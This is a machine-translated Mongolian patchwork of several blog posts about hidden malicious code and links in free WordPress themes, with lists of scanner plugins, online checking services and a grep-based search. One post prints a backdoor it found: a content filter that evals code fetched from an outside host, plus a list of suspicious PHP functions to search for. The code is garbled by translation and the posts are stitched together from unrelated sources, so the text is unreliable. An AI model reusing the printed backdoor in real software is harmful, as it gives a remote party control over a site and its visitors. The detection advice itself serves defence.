Сайн уу найзуудаа. Таны вэбсайт, блогт ашигладаг үнэгүй WordPress загвар үнэхээр аюулгүй бөгөөд далд аюул, хортой код агуулаагүй гэдэгт та итгэлтэй байна уу? Та үүнд бүрэн итгэлтэй байна уу? Мэдээжийн хэрэг үү?)
Та тэд загварыг ажиллуулж, үүнээс далд холбоосыг устгасан гэж бодож байна. Та сайтын файлуудыг вирусны эсрэг програмаар үе үе сканнердаж, "Аюулгүй байдал" таб дахь Yandex вэбмастерын хэрэгслүүдийг хайж олоод, "Аюулгүй байдал" гэсэн мессеж гарч ирнэ. Сайтаас хортой код олдсонгүй«.
Би ч бас тэгж бодсон. Би чамайг бухимдуулахыг хүсэхгүй байна, гэхдээ...
Үнэгүй WordPress сэдэвт нууцлагдсан аюултай код
Энэ бол өнгөрсөн долоо хоногт миний хостингоос шуудангаар ирсэн захидал юм. Саяхан тэд сайтын бүх файлыг хортой контент байгаа эсэхийг тогтмол шалгадаг болсон ч надаас энэ агуулгыг олсон!
Энэ бүхэн нэг өдөр би сайт руугаа ороод нээх боломжгүй болсноос эхэлсэн - php өргөтгөлтэй файл олдсонгүй гэсэн доромжилсон бичээс гарч ирэв. Жаахан сандраад би хостинг дээрх сайттай хавтасны агуулгыг судлахаар очоод тэр даруй асуудал олж мэдэв - миний fuctions.php загвар файлын нэрийг functions.php.malware болгон өөрчилсөн нь хоёрдмол утгатай санагдсан юм - Антивирус эсвэл үүнтэй төстэй зүйл энд ажиллаж байсан) Би шуудан руу ороод хостоос дээрх тайланг олсон.
Миний хийсэн хамгийн эхний зүйл бол мэдээж шалгах явдал байсан өгсөн файл, түүний агуулгыг судалж, янз бүрийн антивирусаар сканнердсан, олон арван онлайн үйлчилгээвирусыг шалгах гэх мэт. - Эцэст нь би юу ч олсонгүй, бүгд санал нэгтэйгээр файл бүрэн аюулгүй гэж мэдэгдэв. Мэдээжийн хэрэг, би таныг ямар нэг зүйл будлиулсан гэж эргэлзэж байгаагаа гэрийн эзэнд илэрхийлсэн боловч ямар ч байсан хор хөнөөлтэй код илрүүлсэн тухай тайлан гаргаж өгөхийг хүссэн.
Тэгээд тэд надад ингэж хэлсэн
Би энэ кодын талаарх мэдээллийг google-д ороод нухацтай бодож үзсэн ...
Загвараас хортой кодыг хэрхэн олох вэ
Энэ нь сонирхсон хүмүүст таны мэдээлэлгүйгээр таны сайт руу өгөгдөл дамжуулах, хуудасны агуулгыг өөрчлөх боломжийг олгодог үнэхээр чухал биш заль мэх юм. Хэрэв та үнэгүй загвар ашиглаж байгаа бол Дараах кодыг functions.php-г шалгахыг зөвлөж байна:
нэмэх_шүүлт('агуулгын_контент', '_bloginfo', 10001);
функц _bloginfo($content)(
global $post;
хэрэв(ганц бие() && ( [имэйлээр хамгаалагдсан](get_option('blogoption'))) !== худал)(
$co буцаана;
) эс бөгөөс $ контентыг буцаана;
}
Миний php-ийн талаар маш бага мэдлэгтэй байсан ч гэсэн зөвхөн блог шуудангийн хуудсууд дээр агуулгыг харуулах үүрэгтэй глобал хувьсах нийтлэл, агуулгатай холбоотой тодорхой шүүлтүүр үүсгэгдэж байгааг харж болно (is_single нөхцөл). Аль хэдийн сэжигтэй байгаа биз дээ? За, одоо энэ нь юу харуулахыг харцгаая өгсөн кодманай вэбсайт дээр.
Өгөгдлийн санд хүссэн блогын сонирхолтой сонголт бас маш сэжигтэй харагдаж байна. Бид мэдээллийн сан руугаа ордог MySQL өгөгдөлмөн бид тэндээс wp_options нэртэй хүснэгтийг олдог бөгөөд хэрэв та угтварыг өөрчлөөгүй бол энэ нь анхдагч байдлаар иймэрхүү харагдах болно. Үүнээс бид блогoption гэж нэрлэгддэг бидний сонирхлын шугамыг олдог
Ямар үзэсгэлэнтэй юм бэ! Бид дараах сонголтыг харж байна
буцаах үнэлгээ(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
Тэдгээр. бидэнд тодорхой сайтаас (түүнээс гадна орос хэлээр) ямар ч зүйлийг авч явах контентыг буцааж өгнө үү! Ямар ч тооны холбоос, хортой код, өөрчилсөн текст гэх мэт. Сайт өөрөө хандахдаа 403 хандалтын алдаа гаргадаг бөгөөд энэ нь гайхмаар зүйл биш юм. Мэдээжийн хэрэг, би энэ сонголтыг мэдээллийн сангаас хассан.
Хохирогчдын мэдээлснээр таны нийтлэлийн агуулгыг ихэвчлэн ямар нэгэн цэгийн оронд зөвхөн нэг өөрчлөлтөөр буцааж өгдөг. Текст дотор нээлттэй холбоосыг далдалсан байна! Дашрамд хэлэхэд, энэ сонголтыг загвар өөрөө суулгасан үед мэдээллийн санд бичдэг бөгөөд дараа нь үүнийг хийдэг код нь өөрөө өөрийгөө устгадаг. Тэгээд би ийм хогтой хоёр жил амьдарсан ч нэг ч антивирус, үйлчилгээ надад илчлээгүй энэ аюулТэр бүх хугацаанд. Үнэнийг хэлэхэд, энэ техник надад хэзээ нэгэн цагт ажиллаж байсан уу, эсвэл миний хамгаалалтын залгаас энэ боломжийг хаасан (эсвэл WordPress-ийн шинэчлэлтүүдийн нэг нь энэ нүхийг хаасан) эсэхийг би анзаараагүй ч энэ нь тааламжгүй хэвээр байна.
Үнэгүй бяслагны ёс суртахуун
Манай "орчуулагчдын" загваруудын (эсвэл тэдгээрийг каталог дээрээ байрлуулсан хүмүүсийн) нарийн төвөгтэй байдал танд хэр таалагдаж байна вэ? Хөлийн хэсгээс холбоосыг хасах нь танд зориулагдаагүй) Би загвараа хаанаас татаж авснаа санахгүй байна, харамсалтай байна, энэ нь эрт дээр үеэс байсан, эс тэгвээс би хэдэн сайхан сэтгэлтэй зүйл бичих байсан. Хэрэв тэр үед надад одоо байгаа туршлага байсан бол би үнэгүй загвар ашиглахгүй, эсвэл онцгой тохиолдолд үл мэдэгдэх эх сурвалжаас татаж авахгүй байх байсан!
Албан ёсны дээд зэрэглэлийн загварыг ижил загвар дээр 15-20 доллараар худалдаж аваад, ямар ч цоорхой, шифрлэгдсэн холбоос байхгүй гэдгийг мэдэж, тайван амьдрах нь илүү хялбар бөгөөд эмзэг байдал байсан ч хөгжүүлэгчид шинэчлэлтийг гаргах нь гарцаагүй. Эдгээр нүхнүүд хаагдах болно. ( Дашрамд дурдахад, Артем саяхан нийтлэлээ нийтэлсэн бөгөөд тэр зүгээр л дээд зэрэглэлийн загваруудын талаар ярьж, сонирхож буй хүмүүст харгис хямдралын сурталчилгааны кодуудыг тараажээ.)
WordPress бол янз бүрийн мэдээллийн сайт, блог үүсгэх хамгийн алдартай хөдөлгүүр юм. Таны вэбсайтын аюулгүй байдал нь таны мэдээллийн аюулгүй байдлаас илүү чухал юм. Энэ нь илүү чухал, учир нь энэ нь таны нөөцийг уншиж, түүнд итгэдэг бүх хэрэглэгчдийн аюулгүй байдал юм. Ийм учраас сайт нь вирус болон бусад хортой кодоор халдваргүй байх нь маш чухал юм.
Бид дараах нийтлэлүүдийн аль нэгэнд WordPress-ийг хакердахаас хэрхэн хамгаалах талаар авч үзэх болно, гэхдээ одоо би бүх зүйл аюулгүй байгаа эсэхийг шалгахын тулд WordPress сайтаа вирус, хортой кодыг хэрхэн шалгах талаар хэлэхийг хүсч байна.
Хамгийн эхний санаанд орж ирдэг сонголт бол хакерууд таныг хакердаж, спам илгээх, линк оруулах болон бусад муу зүйлийг ашиглахын тулд таны сайтын код руу арын хаалга хийсэн гэсэн үг юм. Энэ нь заримдаа тохиолддог, гэхдээ хэрэв та програмыг цаг тухайд нь шинэчлэх юм бол энэ нь маш ховор тохиолддог.
Тэнд мянга мянган үнэгүй WordPress сэдэв, залгаасууд байдаг бөгөөд энд л аюул бий. WordPress сайтаас загвар татаж авах нь нэг хэрэг, зүүн талд байгаа сайтаас олоход огт өөр зүйл юм. Шударга бус хөгжүүлэгчид төрөл бүрийн хортой кодыг бүтээгдэхүүндээ суулгаж болно. Хэрэв та дээд зэрэглэлийн загваруудыг үнэ төлбөргүй татаж авбал илүү эрсдэлтэй байдаг бөгөөд хакерууд ямар ч эрсдэлгүй бөгөөд аюулгүй байдлын цоорхойг нэмж, улмаар нэвтэрч, хэрэгтэй зүйлээ хийх боломжтой. Ийм учраас Wordpress сайтаа вирус байгаа эсэхийг шалгах нь маш чухал юм.
Wordpress сайтыг вирус шалгаж байна
Сайтыг шалгахдаа хамгийн түрүүнд анхаарах зүйл бол вирус биш, WordPress залгаасууд юм. Та сайтаа хурдан бөгөөд хялбараар мөлхөж, тухайн сэдэв, залгаас эсвэл Wodpress-ийн үндсэн хэсэгт байгаа эсэхээс үл хамааран хайх хэрэгтэй кодын сэжигтэй хэсгүүдийг олох боломжтой. Хамгийн алдартай залгаасуудын заримыг харцгаая:
1.TOC
Энэхүү маш энгийн залгаас нь таны сайт дээр суулгасан бүх сэдвүүдийг хортой код байгаа эсэхийг шалгадаг. Plugin нь base64 код оруулах замаар шифрлэгдсэн далд холбоосуудыг илрүүлж, мөн дэлгэцэнд харуулна дэлгэрэнгүй мэдээлэлилэрсэн асуудлуудын талаар. Ихэнх тохиолдолд кодын олдсон хэсгүүд нь вирус биш боловч аюултай байж болзошгүй тул та тэдэнд анхаарлаа хандуулах хэрэгтэй.
Нээлттэй "Гадаад төрх" -> "TAC"дараа нь бүх сэдвүүдийг шалгах хүртэл хүлээнэ үү.
2.VIP сканнер
TOC сэдвийн сканнертай маш төстэй боловч илүү дэлгэрэнгүй мэдээлэлтэй. Холбоос, далд код болон бусад хортой оруулгыг илрүүлэх ижил боломжууд. Хэрэгслийн хэсэг дэх VIP сканнерийн зүйлийг нээгээд үр дүнд дүн шинжилгээ хийнэ үү.
Энэ нь шаардлагагүй файлуудыг устгахад хангалттай байж болох юм, жишээ нь desktop.ini. Эсвэл та base64-ийг ашиглан файлд юу тохиолдохыг сайтар судлах хэрэгтэй.
3. GOTMLS.NET-ийн Anti-Malware
Энэхүү залгаас нь зөвхөн сэдэв болон сайтын үндсэн вирусыг сканнердах төдийгүй, сайтыг нууц үгийн харгислал болон төрөл бүрийн XSS, SQLInj халдлагаас хамгаалах боломжийг олгодог. Хайлт нь мэдэгдэж буй гарын үсэг болон сул талууд дээр тулгуурлан хийгддэг. Зарим эмзэг байдлыг газар дээр нь засах боломжтой. Файлуудыг сканнердаж эхлэхийн тулд нээнэ үү "Анти Малваре"хажуугийн мөрөнд товшино уу "Скан хийх":
Та скан хийхээсээ өмнө гарын үсгийн мэдээллийн санг шинэчлэх хэрэгтэй.
4. Wordfence
Энэ бол хамгийн алдартай WordPress аюулгүй байдал, хортой програм сканнердах залгаасуудын нэг юм. WordPress кодын ихэнх хавчуургыг олох боломжтой сканнераас гадна бодит цагийн хамгаалалт байдаг. төрөл бүрийндайралт ба харгис хүчний дайралт. Хайлтын явцад залгаас олдог болзошгүй асуудлуудТөрөл бүрийн залгаасууд болон сэдвүүдтэй, WordPress-ийг шинэчлэхийг танд хэлдэг.
Таб нээх "WP хамгаалалт"хажуугийн мөрөнд, дараа нь таб руу очно уу "Сканнердах"болон дарна уу "Скан хийж эхлэх":
Скан хийхэд зарцуулагдаж магадгүй тодорхой хугацаа, гэхдээ дууссаны дараа та олсон асуудлын дэлгэрэнгүй тайланг харах болно.
5. Вирусын эсрэг
Энэ бол таны вэбсайтын загварт хортой кодыг сканнердах өөр нэг энгийн залгаас юм. Сул тал нь зөвхөн одоо байгаа загварыг сканнердсан боловч мэдээллийг хангалттай нарийвчлан харуулсан болно. Та сэдэвт байгаа бүх аюултай шинж чанаруудыг харах бөгөөд дараа нь тэдгээр нь ямар нэгэн аюул учруулж байгаа эсэхийг нарийвчлан шинжлэх боломжтой. Нэг зүйлийг ол "Антивирус"тохиргоо руу ороод дараа нь товшино уу "Сэдвийн загваруудыг одоо сканнердах":
6. Бүрэн бүтэн байдлыг шалгагч
Мөн бүрэн бүтэн байдлыг шалгахыг зөвлөж байна WordPress файлууд, вирус хаа нэгтээ аль хэдийн бүртгүүлсэн тохиолдолд. Үүнийг хийхийн тулд та Integrity Checker залгаасыг ашиглаж болно. Энэ нь бүх үндсэн, залгаас болон загвар файлуудад өөрчлөлт орсон эсэхийг шалгадаг. Сканнерын төгсгөлд та өөрчлөгдсөн файлуудын талаарх мэдээллийг харах болно.
Онлайн үйлчилгээ
Wordpress сайтаа вирус байгаа эсэхийг шалгах эсвэл зүгээр л загварыг шалгах боломжийг олгодог хэд хэдэн онлайн үйлчилгээ байдаг. Тэдгээрийн заримыг энд дурдъя:
themecheck.org- та сэдэвчилсэн архивыг татаж аваад, түүнд ашиглагдаж буй хортой функцүүдийн талаархи бүх анхааруулгыг харах боломжтой. Та зөвхөн өөрийн сэдвийн талаарх мэдээллийг харахаас гадна бусад хэрэглэгчдийн байршуулсан бусад сэдвүүд болон тухай мэдээллийг үзэх боломжтой өөр өөр хувилбаруудСэдвүүд. Плагинуудын олсон бүх зүйлийг энэ сайтаас олж болно. Шалгалт wordpress сэдвүүдбас маш чухал.
virustotal.com- Та өөрийн сайт эсвэл загвар файлыг вирусын эсрэг шалгах боломжтой сайн мэддэг эх сурвалж.
ReScan.pro- Энэ үйлчилгээг ашиглан WordPress сайтад вирус байгаа эсэхийг шалгах нь үнэ төлбөргүй бөгөөд статик болон динамик шинжилгээг хийж болзошгүй дахин чиглүүлэлтүүдийг илрүүлдэг.Сканнер нь сайтын хуудсыг нээдэг. Сайтыг янз бүрийн хар жагсаалтаас шалгадаг.
sitecheck.sucuri.net- вирусын сайт болон сэдвийг сканнердах энгийн үйлчилгээ. WordPress-д зориулсан залгаас байдаг. Аюултай холбоосууд болон скриптүүдийг илрүүлдэг.
Гараар шалгах
Гараар баталгаажуулахаас илүү сайн зүйл байхгүй. Линукс нь файл бүхий хавтсанд дурын мөрүүдийг хайх боломжийг олгодог гайхалтай grep хэрэгсэлтэй. Бид юу хайхыг ойлгоход л үлдлээ:
eval - энэ функц нь дур зоргоороо ажиллах боломжийг олгодог php код, энэ нь өөрийгөө хүндэтгэдэг бүтээгдэхүүнд ашиглагддаггүй, хэрэв залгаасуудын аль нэг нь эсвэл сэдэв нь энэ функцийг ашигладаг бол тэнд вирус байгаа нь бараг 100% итгэлтэй байна;
- base64_decode- Шифрлэлтийн функцийг eval-тай хамт хортой кодыг нуух боломжтой, гэхдээ тэдгээрийг тайван зорилгоор ашиглах боломжтой тул болгоомжтой байгаарай;
- ша1- хортой кодыг шифрлэх өөр арга;
- gzinflate- шахалтын функц, ижил зорилго, үнэлгээний хамт, жишээ нь gzinflate(base64_decode(code);
- strrev- хувилбарыг анхдагч шифрлэлтэд ашиглаж болох тул мөрийг өмнө нь биш хойш нь эргүүлнэ;
- хэвлэх- gzinflate эсвэл base64_decode-тэй хамт хөтөч рүү мэдээллийг хэвлэх нь аюултай;
- file_put_contents- WordPress өөрөө эсвэл залгаасууд нь файлын системд файл үүсгэх боломжтой боловч хэрэв сэдэв үүнийг хийвэл вирус суулгаж болох тул болгоомжтой байж, яагаад хэрэгтэй байгааг шалгах хэрэгтэй;
- file_get_contents- ихэнх тохиолдолд үүнийг тайван зорилгоор ашигладаг боловч хортой кодыг татаж авах эсвэл файлаас мэдээлэл уншихад ашиглаж болно;
- буржгар- ижил түүх;
- fopen- бичихийн тулд файлыг нээдэг, та юу болохыг хэзээ ч мэдэхгүй;
- систем- функц нь Линукс системд командыг гүйцэтгэдэг, хэрэв үүнийг сэдэв, залгаас эсвэл wordpress өөрөө хийсэн бол вирус байгаа байх;
- тэмдэгт холбоос- системд бэлгэдлийн холбоос үүсгэдэг, магадгүй вирус гол болгохыг оролдож байна Файлын системгаднаас авах боломжтой;
- хуулбарлах- файлыг нэг газраас нөгөөд хуулах;
- getcwd- одоогийн ажиллаж байгаа лавлахын нэрийг буцаана;
- cwd- одоогийн ажлын лавлахыг өөрчлөх;
- ini_get- PHP тохиргооны талаарх мэдээллийг ихэвчлэн тайван зорилгоор хүлээн авдаг, гэхдээ та хэзээ ч мэдэхгүй;
- алдааны_тайлагнах(0)- аливаа алдааны мэдэгдлийн гаралтыг идэвхгүй болгох;
- цонх.дээд.байршил.href- бусад хуудас руу чиглүүлэхэд ашигладаг javascript функц;
- хакердсан- Тиймээс, ямар ч тохиолдолд бид шалгаад, гэнэт хакер өөрөө бидэнд хэлэхээр шийдэв.
Та үг бүрийг дараах тушаалаар орлуулж болно:
grep -R "хакердсан" /var/www/path/to/files/wordpress/wp-content/
Эсвэл бүх үгийг нэг дор хайх энгийн скрипт ашиглана уу:
утгууд="base64_decode(
үнэлэх(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
цонх.дээд.байршил.href
хуулбар(
үнэлэх(
систем(
тэмдэгт холбоос(
алдааны_тайлагнах(0)
хэвлэх
file_get_contents(
файлын_оруулсан_агуулга(
fopen(
хакердсан"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$ үнэ цэнэ" *
Сайн байна уу Idea Fox найзууд!
Би чамайг мэдэхгүй ч би шөнө сайн унтдаггүй. Блогын аюулгүй байдлын асуудал намайг зовоож байна. Дахиж хүч байхгүй :-)
Би энэ сэдвээр олон тооны блог уншиж, энэ асуудлыг шийдвэрлэхэд туслах олон залгаасуудыг туршиж үзсэн. Тийм ээ, мөн сэтгэгдэл дээр тэд сайтыг хамгаалах сэдвээр асуулт асууж эхэлсэн нь намайг энэ тэмдэглэлийг бичихэд хүргэв.
Та блог хөтөлж, нийтлэл бичиж, хичээж байна гэж төсөөлөөд үз дээ ... Тэгээд муу ёрын новшнууд ирж танай сайтыг эвддэг. Урам хугарал их гарах байх гэж бодож байна.
Эцсийн эцэст, энгийн блог хөтлөгч бүр өөрийн сайтыг хөгжүүлэхэд маш их цаг хугацаа, хүчин чармайлт гаргадаг. Мөн олон хүмүүсийн хувьд блог хөтлөх нь ерөнхийдөө дур сонирхол болж хувирдаг ... Хэрэв ИЙМ болбол :-)
Энэ ямар чухал болохыг та ойлгож байна.
Эцэст нь ажилдаа орцгооё :)
Хэдэн сарын өмнө би хакердсан зүйлийн талаар аль хэдийн тэмдэглэл бичсэн. Заавал уншаарай. Гэхдээ тэр цагаас хойш нэлээд хугацаа өнгөрч, би бүх талын хамгаалалтыг бэхжүүлэх нэмэлт арга хэмжээ авсан.
Дараах тэмдэглэлд би энэ асуудлыг нарийвчлан авч үзэх болно. (Би бас ISP тохируулах талаар санаж, бичдэг)
3. Бид бусад онлайн үйлчилгээнүүдийн сайтыг шалгадаг
Ийм үйлчилгээ нь илт-үл үзэгдэх байдлаар салсан. Тэдний олонх нь тэнэг бөгөөд зөвхөн зар сурталчилгаа үзүүлэхийн тулд бүтээгдсэн гэж би хатуу боддог.
Доктор Вэб
DR.Web хийсэн сайн үйлчилгээвэб сайтуудыг онлайнаар шалгах. Би хувьдаа тэр надад нэг удаа блог дээрх найзаасаа халдвар илрүүлэхэд тусалсан (.htaccess файлд гуравдагч талын код байсан)
Шалгалт нь маш энгийн. URL хаягаа оруулаад шалгалтын үр дүнг хүлээнэ үү.
antivirus-alarm.ru
43 хүртэл ашигладаг хүчирхэг вэбсайт мөлхөгч вирусын эсрэг мэдээллийн сандэлхийн тэргүүлэгч вирусны эсрэг компаниудаас.
Энд бас бүх зүйл маш энгийн. Бид сайтынхаа URL хаягаар нэвтэрч, сканнердсан үр дүнг хүлээж байна.
Энэ бол миний хүлээж байсан зүйл юм.
Бүх зүйл цэвэрхэн, тайван унтаж болно :-)
Энэ бүхэн мэдээж сайн, гэхдээ та WordPress блогт огтхон ч саад болохгүй хэд хэдэн залгаас суулгах хэрэгтэй.
4. Хөтлөгчөөс сайтаа шалгахыг хүс
Баримт нь хостууд аюулгүй байдлын асуудалд танаас илүү санаа зовдог бөгөөд хүчирхэг хамгаалалтын хэрэгсэлтэй байдаг. Мөн тусгай хамгаалалтын хэрэгсэл.
Өнөөдөр та бүхэндээ хүргэх миний мэдээ байна. Дараа нь би ярих болно хүчирхэг залгаас, энэ нь танд WordPress блогоо хакердахаас ихээхэн хамгаалах боломжийг олгодог.
Би түүнтэй хамт ажиллаад 2 сар болж байгаа бөгөөд түүнд маш их баяртай байна. Одоогоор түүнтэй 3 удаа харьцаж, өөрийгөө хориглосон: -) Товчхондоо хэлэх зүйл байна.
Нэг нь чухал үе шатуудблог үүсгэх үед - өндөр чанартай загвар сонгох. Төлбөртэй, үнэ төлбөргүй олон сайтууд байдаг. Гэхдээ файлтай хамт вирус, хортой скрипт, далд холбоосууд орж ирэх магадлал өндөр тул та энд болгоомжтой байх хэрэгтэй.
Хэдийгээр загвар нь аюулгүй байдлын хувьд цэвэрхэн, дизайн, ашиглах чадвар, функциональ байдал нь танд бүрэн тохирсон байсан ч энэ нь бүх зүйл эмх цэгцтэй байна гэсэн үг биш юм. Сэдэв нь хүчинтэй HTML болон CSS кодтой байхаас гадна бүх стандартад нийцсэн байх ёстой CMS WordPress. Төлбөртэй загварууд болон захиалгаар хийсэн загварууд хүртэл сүүлийнхтэй холбоотой асуудалтай байдаг.
Хөдөлгүүр хөгжүүлэгчид үүнийг байнга хөгжүүлдэг бөгөөд загвар зохиогчид тэдгээрийг бүтээхдээ хуучирсан функцуудыг ашиглан үргэлж дагаж мөрддөггүй.
Өнөөдөр би WordPress сэдвүүдийг стандартад нийцэж байгаа эсэхийг шалгах 2 аргыг танд үзүүлэх болно. Эдгээр хэрэгслүүдийг https://wordpress.org/themes/ албан ёсны лавлахад нэмэхэд ашигладаг.
WordPress загвар болон Joomla загваруудыг стандартад нийцэж байгаа эсэхийг шалгах үйлчилгээ
ThemeCheck.org нь үнэ төлбөргүй үйлчилгээ, энэ нь сайт дээр суулгахаасаа өмнө CMS WordPress болон Joomla-д зориулсан загваруудын аюулгүй байдал, чанарыг шалгах боломжийг олгодог.
Загварыг шалгахын тулд themecheck.org вэбсайт дээрх "Файл сонгох" товчийг дарж архивыг компьютерээсээ байршуулна уу. Хэрэв та сканнерын үр дүнг үйлчилгээнд хадгалж, бусад хэрэглэгчид ашиглахыг хүсэхгүй байгаа бол " Үр дүнгийн дараа байршуулсан өгөгдлийг март“. Одоо "Илгээх" товчийг дарна уу.
Жишээлбэл, би сэдвийг авсан Интерфэйсалбан ёсны вэбсайтаас татаж авсан. 100-аас 99 - 0 чухал алдаануудболон 1 анхааруулга. Энэ бол маш сайн үр дүн юм.
Харьцуулбал миний блогын загвар 0 оноо авсан (14 алдаа, 23 анхааруулга). Олон хүмүүсийн хувьд үр дүн нь тийм ч их ялгаатай биш гэж би бодож байна, ялангуяа сэдвүүд аль хэдийн хуучирсан бол. Олдсон файл, мөрийг харуулсан тайлбар бүхий бүх тайлбарыг доорх хуудсан дээр байрлуулсан болно.
Үнэнийг хэлэхэд, би тэнд нэг их зүйлийг ойлгоогүй, энэ нь зохиогчдод илүү ашигтай байх болно, бүх зүйлийг засахаас илүү загвараа өөрчлөх нь надад илүү хялбар байх болно. Хэзээ үүн дээр хүрэхээ мэдэхгүй байна.
Нүүр хуудас нь өмнө нь туршиж үзсэн WordPress болон Joomla вэб сэдвүүдийн өргөн сонголттой бөгөөд нэмсэн эсвэл үнэлэгдсэн хугацаагаар нь ангилах боломжтой. Тэдгээр дээр дарснаар та зохиогчийн вэбсайт болон татаж авах хуудасны дэлгэрэнгүй мэдээлэл, холбоосыг харах боломжтой.
Хэрэв та хөгжүүлэгч бөгөөд таны сэдэв 100% хүчинтэй бол үүн дээр тусгай үнэлгээний тэмдэг тавьж, хэрэглэгчдэд энэ тухай мэдэгдэх боломжтой.
ThemeCheck.org үйлчилгээний үнэ цэнэ нь ямар ч вэбмастер блог дээр суулгахаасаа өмнө чанартай сэдвийг сонгоход ашиглаж болно.
Загвар шалгах залгаас
Та Theme Check залгаасыг ашиглан аль хэдийн суулгасан загвараа WordPress-ийн сүүлийн үеийн стандартуудтай нийцэж байгаа эсэхийг шалгаж болно. Татаж авах холбоос Хамгийн сүүлийн үеийн хувилбар: https://wordpress.org/plugins/theme-check/
Plugin-ийн ажиллагаа нь миний дээр дурдсан үйлчилгээтэй төстэй юм. Стандарт суулгаж идэвхжүүлсний дараа тохиргоо хийх шаардлагагүй. Шалгах дараалал:
- "Гадаад төрх"-" Загвар шалгах" цэсийн админ самбар руу очно уу.
- Хэрэв хэд хэдэн суулгасан бол унадаг жагсаалтаас хүссэн сэдвийг сонгоно уу.
- Хэрэв та мэдээлэл илгээхийг хүсэхгүй байгаа бол "МЭДЭЭЛЛИЙГ дарах" нүдийг чагтална уу.
- "Шалгах" товчийг дарна уу.
Үр дүнг ижил хуудсан дээр харуулах болно.
Таны харж байгаагаар өгөгдмөл сэдэв Хорин аравЭнэ нь бас тохиромжтой биш, гэхдээ жишээлбэл, Хорин арван дөрөвалдаа байхгүй.
Залгаасыг шалгасны дараа та үүнийг идэвхгүй болгож болох бөгөөд дараагийн удаа хүртэл бүхэлд нь устгах нь дээр.
Дүгнэлт.Шинэ WordPress загвар суулгахаасаа өмнө үүнийг зөвхөн биш шалгах хэрэгтэй далд холбоосуудболон хортой кодыг TAC залгаастай, мөн ThemeCheck.org үйлчилгээ эсвэл Theme Check залгаасыг ашиглан CMS-ийн хамгийн сүүлийн үеийн стандартад нийцүүлэх боломжтой.
P.S.Саяхан TopSape Reader-ийг үзэж байхдаа би zenpr.ru шинэ SEO блогийг олж харсан бөгөөд энэ нь блогчдын дунд сард товшилтоор 1-р байрыг эзэлдэг. Түүний нас сар гаруйхан байгаа тул үр дүн нь хүндэтгэлтэй байх болно. Минимализмын хэв маягийн дизайн, хэрэв энэ нь огт байхгүй гэж хэлэхгүй бол зохиолч бичсэн - та үүнийг унших болно. Бүх бизнес, усгүй. Яг л блогын гарчиг шиг "нэмэлт тэмдэгт байхгүй." Уншихыг зөвлөж байна, та маш их хэрэгтэй мэдээлэл олж авах болно.
Интернет дээр маш олон үнэгүй вэбсайтын загварууд байдаг. Тэр үнэгүй бяслагЭнэ нь зөвхөн хулганы хавханд л тохиолддог, хүн бүр мэддэг ч ийм үнэгүй програмыг татаж аваад вэбсайт дээрээ суулгахын тулд гар сунгадаг.
Үнэгүй загвар суулгахаасаа өмнө далд холбоос байгаа эсэхийг шалгахад гэмгүй.
Үнэгүй загвар оруулснаар олон хүмүүс ийм сайтыг сурталчилж, мөнгө олох боломжгүй гэж боддоггүй.
Нэг ийм загварт нэг дор хэд хэдэн холбоос байж болно. Үүрлэсэн холбоосууд нь насанд хүрэгчдэд зориулсан сайт биш харин таны сэдэвтэй төстэй сайттай байвал сайн. Тэгээд хэдэн арван биш хоёр гурав л байх болно.
Ийм үнэгүй загвар суулгах нь таны сайтад хэрхэн заналхийлж байна вэ? Сайт нь шүүлтүүрийн дор унах бөгөөд үүнээс гарах нь бараг боломжгүй юм. Шүүлтүүртэй сайт бол үхсэн сайт юм!
Сайтдаа үнэгүй загвар суулгах нь Оросын рулет тоглохтой адил юм. Зөвхөн бүрэн тохируулах боломж цэвэр загвар, тэгтэй тэнцүү.
Хамгийн сайндаа та өөрийн сайт дээр 3-5 зүүн холбоосыг авах болно. Мэдээжийн хэрэг, та ийм загварыг цэвэрлэхийг оролдож болно, гэхдээ загварт холбоосыг тэндээс устгах боломжгүй байдлаар оруулдаг гар урчууд байдаг (загвар нь эвдэрсэн, зүгээр л мушгирах болно).
Үнэнийг хэлэхэд, шинэ цэвэр, өвөрмөц (үнэгүй гэж хэлж болохгүй) загварыг захиалах нь илүү хялбар бөгөөд энэ нь хямд байх болно.
Жишээлбэл, би загвар үүсгэхийн тулд 200 рубль авдаг (Skype руу бичих: oxamitta). Надад хэлээч, энэ нь үнэ цэнэтэй юу? Үнэгүй аваад сайтаа алдаж, гэхдээ 200 рубль хэмнэх үү? Хөөе хэмнэлт!!!
Гэхдээ та аль хэдийн үнэгүй загвар дээр бооцоо тавьсан бол яах вэ? Загвар дээр далд холбоос байгаа эсэхийг хэрхэн шалгах вэ?
Үүний тулд тусгай залгаас байдаг. Энэ нь эдгээр холбоосыг устгахад тус болохгүй, гэхдээ тэдгээрийг танихад тусална уу.
Магадгүй бүх зүйл тийм ч аймшигтай биш бөгөөд таны загварт зөвхөн хэд хэдэн гадаад холбоос байдаг! Та загварыг туршиж үзэхийг хүсч байна уу? Дараа нь доорх линкээс залгаасыг татаж авна уу (залгаасыг татаж авах холбоосыг үзэхийн тулд нийгмийн сүлжээнүүдийн аль нэг товчлуур дээр дарна уу).
Плагиныг сайтын админ самбарт стандарт аргаар суулгасан. Энэ видеоны талаар зураг авалт хийх нь утгагүй тул өнөөдөр бид хэд хэдэн дэлгэцийн агшинг хийх болно.
Залгаасыг суулгаад идэвхжүүлнэ үү.
Дэлгэцийн агшинг томруулахын тулд хулганы зүүн товчийг дарна уу. 
Гадаад төрх, TAS таб руу очно уу.
Ачааж байна...